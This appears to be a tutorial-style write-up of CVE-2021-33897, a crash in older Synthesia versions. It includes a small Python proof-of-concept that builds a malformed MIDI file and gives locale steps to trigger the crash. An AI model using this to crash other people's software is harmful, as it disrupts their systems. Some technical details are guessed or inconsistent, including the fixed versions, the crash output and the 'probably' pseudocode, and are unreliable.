Disclosure Timeline
References:
- CVE-2021-33897 NVD Entry
- Synthesia Official Site
Introduction
Synthesia is a popular educational music application for learning and playing MIDI songs, beloved by beginners and hobbyists all over the world. However, if you've been using an old version (anything before Synthesia 10.9), you could be at risk for a DoS (Denial of Service) just by opening a bad MIDI file—especially if your system uses a non-Latin language.
This article will break down what happened, how an attacker can exploit it, and real code snippets to help you understand the issue. You'll also get guidance on avoiding the bug and protecting your machine.
Buffer Overflow in Non-Latin Locale
Older Synthesia versions (before 10.7.5567) had a memory handling bug. When you used, for example, a Russian or Chinese locale and tried to delete a MIDI file with incorrectly formed bytes (the file isn't a well-behaved MIDI), Synthesia tried turning those bytes into characters for display or logging. If the byte sequences didn’t match valid characters in the active locale, the function handling them would not check for buffer length correctly—sending random garbage into memory and often crashing the application.
Path Handling in File Deletion
In versions before 10.9, Synthesia had another bug: it failed to handle malformed file paths correctly during deletion attempts of the MIDI file. With a weird sequence of bytes, the app could get confused when translating or interpreting the file path, again resulting in an application crash.
Exploiting CVE-2021-33897 Step-by-Step
*You must not use this for malicious purposes. Use only to secure your own systems or in a controlled environment for learning.*
What You Need
- Synthesia < 10.9 (Get the demo from somewhere like OldVersion.com)
1. Crafting a Bad MIDI File
We'll make a file that pretends to be MIDI, but has random malformed bytes that aren't allowed in real MIDI files:
# bad_midi_creator.py
with open("bad.mid", "wb") as f:
# Write MIDI header chunk, but add garbage
f.write(b'MThd')
f.write(b'\x00\x00\x00' + b'\x08') # Wrong header length
f.write(b'\x00' * 8) # Garbage header data
# Add more malformed chunks (non-UTF, random bytes)
f.write(b'\xFF\xFF\xFF\xFF\xFF\xAA\xBB\xCC\xDD')
print("Done! Bad MIDI file 'bad.mid' created.")
Or, simply use a hex editor and create a small file starting with MThd and then random data.
2. Setting Non-Latin Locale
Many Windows users set this in Region > Administrative > Change system locale (set to Russian or Chinese).
Linux/Mac: export LANG=ru_RU.UTF-8
Try to delete the file from within Synthesia (not from file explorer!)
- The app will attempt to display or log the file name/path and crash
When running with debugger/console, output may look like
Unhandled exception at x7ff6e1c1 in Synthesia.exe:
Buffer overflow detected: stack smashing detected
or
App crash: file path conversion error
Technical Details: Why Does It Crash?
The root problem is failure to validate input when converting system bytes to application strings (internally probably something like):
// Pseudocode
char path[MAX_PATH];
strcpy(path, incoming_file_path); // No length check, and incoming_file_path may be longer than MAX_PATH or contain bad encoding
On a non-Latin locale, Windows tries to interpret bytes as, say, Cyrillic, but malformed sequences cause internal conversion functions to spill out of the buffer, trashing memory.
Path Handling:
When trying to display or access the path for deletion, the app again mishandles bad sequences. On older Synthesia, if the string can’t be properly parsed, it passes a corrupted pointer or incorrect length to Windows API for deletion, triggering a crash.
Always be careful opening MIDI files from untrusted sources.
- If you experience odd crashes, check the language/locale settings.
References
- CVE-2021-33897 NVD Entry
- Exploit-DB Entry (if available)
Conclusion
While this vulnerability isn’t a “remote hack”, it’s a classic example of how something as simple as a music file and the way your computer handles languages can bring down an application. Stay updated, be aware, and happy (and safe) playing!
*Written exclusively for you. Please do not reproduce without attribution.*
Timeline
Published on: 11/17/2022 21:15:00 UTC
Last modified on: 11/21/2022 20:01:00 UTC